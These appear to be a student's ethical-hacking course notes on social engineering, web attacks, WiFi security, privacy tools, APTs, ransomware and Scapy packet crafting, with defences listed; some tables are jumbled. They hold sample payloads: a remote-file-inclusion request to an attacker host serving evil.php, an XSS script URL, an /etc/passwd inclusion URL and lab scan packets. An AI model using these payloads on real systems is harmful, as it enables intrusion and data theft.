▪ Someone who is important enough who have access to some
valuable resources but not so high profile that they are closely
monitored.
▪ Targets of interest could include CIO (Chief Information
Officer), CSO (Chief Security Officer), CFO (Chief Financial
Officer), etc..
3. Planning the attack
▪ Attack can be done physically or remotely. (Insider or remote
attack)
▪ The plan often requires other social engineering skills such as
charisma, friendly phone voice or physical appearance.
4. Execution
▪ The planned attack should be carried out with confidence and
patience to observe and assess the result of target exploitation.
▪ Also depends on the level of complexity to perform the attack,
other technical apparatuses such as fake websites and malware
may need to be arranged.
Social engineering attack vectors
Phishing
Concept
Types
Where fraudulent
messages are sent to
trick a victim into
revealing sensitive
information.
Messages might
appear as a
trustworthy source.
Spear Phishing
Baiting
Quid pro quo
(something for
something)
The real-world
The hacker offers a
Trojan horse that uses service to his victim
physical media and
in exchange for
relies on the curiosity sensitive information.
or greed of the victim This could bait the
to be executed.
victim with
irresistible offers
such as cash rewards.
Vishing (Voice
Phishing)
Example
Smishing (SMS
Phishing)
Spear Phishing Directed to certain
individuals or
organizations, prior
to the phishing
attempt, extensive
information gathering
is required in order to
increase their
probability of
success.
Vishing –
Impersonating as
target’s company IT
personnel.
Smishing –
Impersonating as
M.O.H regarding
COVID-19 concerns.
An attacker may
create a disk
featuring a corporate
logo, available from
the target’s website,
and label it
“Promotion Result
2019 – Human
Resources”.
The attacker then
leaves the disk
somewhere in the
target company,
which could attract
some employees’
attention.
Attacker posing as IT
employee at a
company, contacting
as many employees
as possible at the
company in exchange
for alleged IT
support.
In return, employees
have to disable their
antivirus system on
their machine, then a
fake technician can
install malware on
the victims’ machine,
posing as software
updates.
Protection against social engineering
1. Organization’s POV
a. Principle of Least Privilege – An information security concept in
which a user is given the minimum levels of access needed to perform
their tasks.
b. Establish an ID system – All employees, consultants and contractors
are issued with IDs when hired, ensure IDs are returned with when
their term with the organization has ended.
c. Immediate action – Whenever suspicious activities and security
breaches are noted.
d. Safeguard trade secrets – Private and confidential information
should be well kept and not easily accessible.
e. Escort – All guests should be escorted at all times when in the
premises.
f. Password change – Enforce employees to change their passwords
regularly (~3 months)
g. Security awareness training – Mandatory cybersecurity training
should be conducted regularly (~4-6 months)
2. Individual POV’s
a. Do not divulge private information – Social engineers might
approach you via social media platforms.
b. Do not click on suspicious website links – Fraudulent emails or SMS
might contain links that request personal information such as your
login credentials.
c. Do not allow strangers to access your wireless network – Malware
or network analyzer might be put inside your system.
Lecture 5-2: Web Penetration
➢ It allows the attacker to influence the SQL queries that an application passes
to a back-end database. Usually, a malicious code is placed in the SQL query
via webpage input.
➢ Damages SQL injection can cause:
o Tampering with existing data in database
o Disclosure of all data on the system (login credentials)
o Voiding transactions or changing balances
o Destroying the data in database or making it unavailable
➢ Prevention
o Use of parameterized statements – where data and code are
separated (most effective)
The whole xyz ‘ 1=1#’ is considered a string. (Parameterized
statements ensure any user input → “converted” to strings instead of a
logic operator)
o Filtering
▪ Make backlists of known-to-be-dangerous patterns, characters,
and commands. (e.g., union, etc)
▪ Make whitelists of allowed operators.
o Give users least privilege
▪ Following the Principle of Least Privilege, only give the users
sufficient/limited privileges in order to proper execute their
tasks.
Web vulnerabilities: concept and prevention
Type of web Description
vulnerability
File upload Attacker uploads
Command
execution
Local file
inclusion
(LFI)
any executable
files such as a
PHP file to a
vulnerable
website.
Attackers are
able to execute
OS commands
on the target web
server.
It can be used to
obtain a reverse
shell by making
the target server
connect to the
attacker’s
machine.
A web
vulnerability
caused by
mistakes made
by a programmer
of a website or
web application.
Tools used
Weevely – A PHP backdoor generator tool in Kali
Once the PHP file has been uploaded and executed, a backdoor will be created
between Kali and the target website for stealthy web shell.
For example, Unix commands could be executed on the website to create a
reverse shell and connect to Kali.
On Kali, the attacker can execute non-interactive commands or do a file
transfer.
Attacker simply change the URL from:
https://example-site.com/?module=contact.php
to:
https://example-site.com/?module=/etc/passwd
And in the absence of proper filtering, the server will display the sensitive
content of the /etc/passwd file → lead to further attacks.
It is used to trick
the web
application into
exposing or
running files on
the web server.
(Directory
Traversal is also
possible)
Remote file
inclusion
(RFI)
Listed as one of
the OWASP Top
10 web
application
vulnerabilities.
An attack
conducted when
the web
application
downloads and
executes a
remote file.
The attacker could make the following HTTP request to trick the application
into executing server-side malicious code, for example, a backdoor.
http://example.com/?file=http://attacker.example.com/evil.php
Cross-Site
Scriping
(XSS)
XSS enables
attackers to
inject client-side
script into
webpages
viewed by other
users.
(Code is NOT
executed on the
server)
Reflected (non-persistent) XSS
➢ Only works if the user visits a specially crafted URL.
➢ Example URL:
http://victim.com/page.php?somevar=<script>alert("Hacked")</script>
Stored (persistent) XSS → More dangerous
➢ It is persistent as the malicious code can be stored into the
page/database → malicious code will be executed every time the page
is loaded on any user’s machine.
The difference between reflected and stored XSS attacks is that reflected XSS
only works if the victim enters the webpage with a custom edited URL as
compared to stored XSS which will be automatically executed on any user.
Methods to prevent XSS vulnerability:
1. Escape any untrusted input.
2. Minimize the manipulation of user input on html.
Lecture 6-1: Wireless Network Penetration and Privacy Tools
Basics of WiFi
➢ It is a consumer-friendly name for Wireless LAN technology based on IEEE
802.11 standards.
Advantages
Convenience – As it allows users to
access network resources from the
nearby vicinity.
Reduced cost – Savings in cost and
labor associated to running physical
cables.
Disadvantages
Range – Wireless network signals
might be affected by interface or
obstacles.
Speed – More drop in performance
than wired networks as wireless
network signals are more subjected to
interference.
Expandability – Wireless networks can
handle the suddenly-increased
number of clients, however in a wired
network, additional wiring will be
required.
Security – Less secure than wired
networks as attackers can only
intercept wired networks via
physical access.
Wireless Networking Modes
Ad-hoc
Infrastructure
Description
Cost effective – It does
not require any equipment
except for wireless
adapters.
Peer-to-peer (P2P)
communication – Suitable
for small network.
Monitor
Access Point – It can provide
Internet connectivity to multiple
clients.
Monitoring – It allows a user to
monitor all traffic received on a
wireless channel.
Communication – All clients
communicate with the AP.
It can also be used for packet
sniffing; however, it only applies
to wireless networks.
Connection – In order for clients to
access the Internet via the AP, they
will have to know the SSID
(Service Set Identifier, WiFi name)
Scalability – It is much more
scalable than ad-hoc mode.
Best Example
Mobile phone hotspot –
Devices can connect to
the hotspot for Internet
access
Home WiFi – Any users can access
connect to the router provided if
they know the SSID (WiFi name)
and the network key (password)
Airmon-ng script – To put the
network card into monitor mode
to capture packets if they aren’t
directed to your computer.
Wireless Equivalent Privacy (WEP): Vulnerabilities
➢ It was the first attempt at wireless protection. The goal was to add security to
wireless networks by encrypting data. Even if the data was intercepted, it
will not be readable as the data has already been encrypted.
➢ However, it is almost out of rotation as it has serious security problems such
as:
o Initial Vector (IV) problem
▪ IV is only 24 bits long, short and reused. (24-bit keys allow for
~16.7 million possibilities, on a busy network, this number can
be easily achieved in a matter of hours.)
▪ WEP does not choose the IV at random.
▪ WEP does not use counter to make IV unique.
o Weak algorithms problem
▪ The encryption algorithm RC4 used is known to be weak.
▪ The integrity check algorithm CRC-32 is known to be weak.
WiFi Protected Access (WPA/WPA2)
➢ Functionalities
o Same goal as WEP, but stronger security. (WPA2 is based on stronger
crypto functions like AES, CBC-MAC and etc.)
o The client and Access Point (AP) share the common secret
(passphrase) called “PMK” from which 2 entities will develop keys
for encryption and authentication.
▪ PMK (Pairwise Master Key) – It is a passphrase pre-shared
between AP and the client.
▪ PTK (Pair Transient Key) – It is derived from PMK as follows:
➢ Vulnerabilities
o Key Reinstallation Attack (KRACK)
▪ The attacker will manipulate and replaying cryptographic
handshake messages to trick the victim into reinstalling an
already-in-use key.
▪ When the victim reinstalls the key, associated parameters such
as nonce are reset to their initial value.
▪ By forcing the nonce reuse in this manner, the encryption
protocol can be attacked (e.g., packets can be replayed,
decrypted, forged)
When a client joins a network, the
4-way handshake will be executed
to negotiate a fresh encryption key.
Client will install this key after
receiving message 3.
If an acknowledgement is not
received, message 3 will be
retransmitted to the client.
Each time the client receives the
message, the same encryption key
will be reinstalled, thereby resetting
the nonce and receive replay
counter.
The attacker can take advantage of
nonce resets by collecting and
replaying retransmissions of
message 3, leading to encryption
protocol attack.
WPA/WPA2 Enterprise
➢ Since WPA/WPA2 uses a pre-shared key, WPA/WPA2 enterprise uses an
additional component called Remote Authentication Dial-In User Service
(RADIUS) server.
o The RADIUS server manages client authentication and generates a
PMK for each client.
o The client and the AP agree on supported security protocols on the
PMK.
o The RADIUS server sends the PMK (of the authenticated client) to
the AP.
o The AP and the client will generate a PTK (Pair Transient Key),
depending on the current session → A secure tunnel between the
client and AP is established.
➢ Advantages of RADIUS:
o PMK (Pairwise Master Key) is unique to each user (client), it does not
have to be shared by any other user.
o Even if a client is revoked, we do not need to worry about the leakage
of the PMK.
Lecture 6-2: Privacy Tools (2) & Miscellaneous Topics
Privacy
➢ The term “privacy” is a double-edged sword
o It can provide a user with a state free from being watched.
o It can provide a hacker with a tool that can hide their tracks of attack.
➢ Anonymity – Providing privacy does not always mean providing anonymity
but anonymity is an essential part of privacy.
Privacy Tools
Definition
Virtual
Private
Network
(VPN)
Tor/Onion
Routing
All the IP
packets from
the source and
a VPN server
are encrypted
through IPSec.
It directs Internet
traffic through a
volunteer overlay
network,
consisting of more
than 7000 relays.
(Concealing a
user’s location
and usage from
anyone perform
network
surveillance)
All Internet
activity of the
user is routed
through the
VPN server.
VPN can hide
the user’s
physical
location.
Tor users can use
the Internet by
connecting
through a series of
virtual tunnels
rather than
making a direct
connection.
Internet
Protocol
Security
(IPSec)
It is a group of
protocols that
are used
together to set
up encrypted
connections
between
devices.
It is a
framework of
open standards
that provides,
between
participating
peers at the IP
layer with 1.
Data
confidentiality
2. Data integrity
3. Data
authentication
IPSec can
protect data
flows between
1. A pair of
hosts
2. A pair of
security
gateways
3. Between a
security
gateway and a
host
DNS
Encryption
Protection
based on
cryptography
(GPG)
A DNS query
leaks the
information
about the sites
the user is
communicating
with.
It can use both
symmetric and
asymmetric
encryption to
encrypt, decrypt
and sign
messages using
public and
private keys.
ISP can snoop
the entries in
the DNS server
it is running.
Examples
Originally
VPN was
created for
employees to
securely
connect to
their
company’s
network
remotely.
To create a private
network path
using Tor, the
client builds a
virtual circuit of
encrypted
connections
(Onion Routing)
one by one
through nodes on
the network.
Between each
hop, a separate set
of encryption keys
are negotiated to
ensure that each
hop can’t trace
these connection
as they pass
through.
Maximum 1 hop
per node in the
circuit.
Limitations
It can
compromise
anonymity and
activity of the
source.
User’s
misconfiguration
can lead to
compromise of
anonymity.
Most popular
application of
IPSec is a VPN.
Most company
uses VPN
because it is
cheaper than
building a
dedicated
private
network.
Tunnel mode –
It is the default
mode. IPSec
wraps the
original IP
packet, encrypts
it, adds a new
IP header, and
sends it to the
other side of the
VPN tunnel.
Transport
mode – Only
the payload of
the IP packet is
encrypted.
(Does not
provide full
anonymity as IP
address is
revealed)
Wide access
range – If a
user is
connecting to a
corporate
network from
his home
network, if
malware is
present, it can
spread to the
computers in
the corporate
network.
DNS over
HTTPS –
Encrypt all the
DNS queries
through TLS.
It allows
sensitive
information to be
easily shared
across an
insecure
network.
Even if a
malicious actor
manages to
intercept the
message, he does
not have the
correct private
key to decrypt it.
➢ Anonymous-friendly Search Engines
o Every major search engine today tracks almost 100% of the searches
the users perform. (Google, Yahoo, Bing)
o DuckDuckGo – This search engine takes to protect user privacy is to
not use the filtering system that major search engines use to offer
“personalized results”.
o Private browsing mode – Browsers such as Google Chrome have a
function called “Incognito mode”. Users can now browse privately,
and all search history will be cleared once the user quits the browser.
➢ Other methods of protecting a hacker’s identity
o Change MAC address
o Use public WiFi with VPN
o Boot a machine from a “live CD” and remove in when you are done.
(It will be operated totally in the RAM)
➢ Zero-Day vulnerability
o A vulnerability in a system that is not yet disclosed to the public,
therefore it is not yet patched.
o Even though the vulnerability might not be publicly known, other
hackers or people who paid for the zero-day vulnerability might be
quietly exploiting it.
➢ Zero-Day exploit
o It is the code that the attackers use to take advantage of the Zero-Day
vulnerability.
o Attackers might use the exploit code to plant a virus or malware (Trojan
Horse) onto a machine.
o Zero-day exploit codes are extremely valuable and are not only used by
hackers but government intelligence/spy agencies.
Zero Day Markets
Black market Grey market White market
Description Criminal hackers
sell/trade in ZeroDay vulnerabilities
or exploits to
anyone who is
willing to offer a
reward (cash
reward/favors) or
for their own
personal usage.
Examples Criminal hackers
can take advantage
of the Zero-Day can
issue ransomware
to companies (for
example) usually in
exchange for huge
cash rewards.
Defense contractors
sell Zero-Day
vulnerabilities or
exploits to
government
intelligence
agencies to use for
surveillance and
offensive computer
operations.
Often purchased by
governments
secretly, to ensure
no one else knows
about these
vulnerabilities.
Researchers or
hackers disclose
Zero-Day
vulnerabilities or
exploits to vendors,
in exchange for
money.
Apple has offered
bounties up to $2
million for their
new privacy
security feature for
their devices,
Lockdown mode.
Advanced Persistent Threat (APT)
➢ An attack campaign conducted by a hacker or a group of hackers, to
establish a long-term presence in a network in order to extract highly
sensitive and valuable data.
➢ Hackers behind this attack campaign are experienced and well-resourced,
some of them are backed up by government agencies to target carefully
chosen and researched targets (including key individuals from companies or
government).
➢ The sole purpose is to extract highly sensitive and value data that will give
them a competitive advantage. (national security data or trade secrets)
➢ Unlike traditional hackers who target a wide range of victims and move on
to something less secure, APT actors will persistently attack their targets
regardless of many failed attempts.
➢ APT attacks are usually stealthy, concealing themselves within the target’s
network and only interact enough to achieve the defined objectives.
➢ Some of the APT actors might purchase and take advantage of Zero-Day
vulnerabilities and exploits to gain access to the target’s network/machine or
to avoid detection.
Phases of APT
1. Reconnaissance/Information gathering
o Attackers will identify and study the targeted organization, collecting
as much information as possible about the technical environment and
key personnel in that organization.
o Social engineering attacks and OSINT (Open Source Intelligence)
gathering are used.
2. Delivery
o Attackers deliver their exploits (malware) to the targets.
o 2 types of delivery mechanisms:
i. Direct delivery – The attackers send exploits to their targets via
social engineering techniques (attack vectors), such as spear
phishing.
ii. Indirect delivery – Stealthy. Attackers will compromise a 3rd
party that is trusted by the target, and then use the compromised
3rd party to indirectly serve exploits.
3. Initial Intrusion
o It happens when the attacker gets a first unauthorized access to the
target’s computer/network.
o Upon delivering the exploit to the target in the delivery stage, the
attacker will be able to gain access to the target’s computer after the
malicious code has been executed that exploits a vulnerability in the
target’s computer or using the user credentials obtained from social
engineering attacks.
4. Command and control
o After the attacker has successfully exploited a vulnerability in the
target’s computer, a backdoor will be established.
o The attacker will use Command and Control (C2) mechanisms to take
control of the compromised computers, enabling further exploitation
of the network.
o To evade detection, the attackers increasingly make use of various
legitimate services and publicly available tools.
5. Lateral movement
o Once the communication between the compromised systems and C2
servers has been established, the attackers move inside the network, in
order to expand their control over the targeted organization.
o Lateral movement usually involves the following activities:
i. Performing internal reconnaissance to map the network and
acquire intelligence.
ii. Compromising additional systems in order to harvest
credentials and gain escalated privileges.
iii. Identifying and collecting valuable digital assets, such as
development plans, trade secrets, etc..
o This stage typically lasts a long period because:
i. The attackers want to harvest a maximum of information over a
long term.
ii. The attacks are designed to run low and slow in order to avoid
detection.
iii. As APT actors move deeper into the network, their movements
will be more difficult to detect.
6. Data exfiltration
o Since one of the primary goals of an APT attack is to steal sensitive
data in order to gain strategic benefits, this is a critical stage for the
attackers.
o Usually, the data is transferred to an internal staging server where the
data is compressed and encrypted for transmission to external
locations under the attackers’ control.
o In order to hide the transmission process, attackers make use of secure
protocols such as SSL/TLS or make use of the anonymity feature of
the Tor network.
Ransomware
➢ It is a type of malware that threatens to publish the victim’s data or
permanently block access to it unless a ransom is paid.
➢ Cryptoviral extortion – It is an advanced technique where the victim’s files
are encrypted, making them inaccessible and demands a ransom payment
(via cryptocurrency) to decrypt them. As recovering the files without the
decryption key is difficult, and it is very difficult to trace digital currency →
difficult to trace the malicious actor as well.
o Example Garmin 2020 – The hackers deployed the ransomeware tool
WastedLocker, which encrypts key data on a company’s digital
infrastructure, their services were disrupted. $10 million were
demanded as ransom for the decryption key.
Scappy
Reference Table for flags, example XMAS flag
CWR
0
ECE
0
URG
1
ACK
0
PSH
1
RST
0
SYN
0
0010
1001
2
9
FIN
1
0x29
Therefore, the commands to craft a packet with URG, PSH AND FIN flags (Xmas)
to Metasploitable2 port 80 are:
>>> a = IP(“10.0.2.4”)
>>> b = TCP(dport=80, flags=0x29)
>>> c = a/b
>>> c
>>> <IP frag=0 proto=tcp dst=10.0.2.4 |<TCP dport=http flags=FPU |>>
>>> sr1(c)
Command Syntax:
a = IP(dst = “<Target IP>”)
b = TCP(dport = <Port Number> , flags = <Hexadecimal> or “<Flag String>”)
Examples using Metasplitable2’s IP address & dport = 80 (http):
1. Craft a TCP packet with a SYN flag
2. Craft a TCP packet with a NULL flag
3. Craft a TCP packet with (URG, PSH, FIN) flags (similar to Xmas scan)
4. Run multiple ports from port 80 to 84
Download
Study collections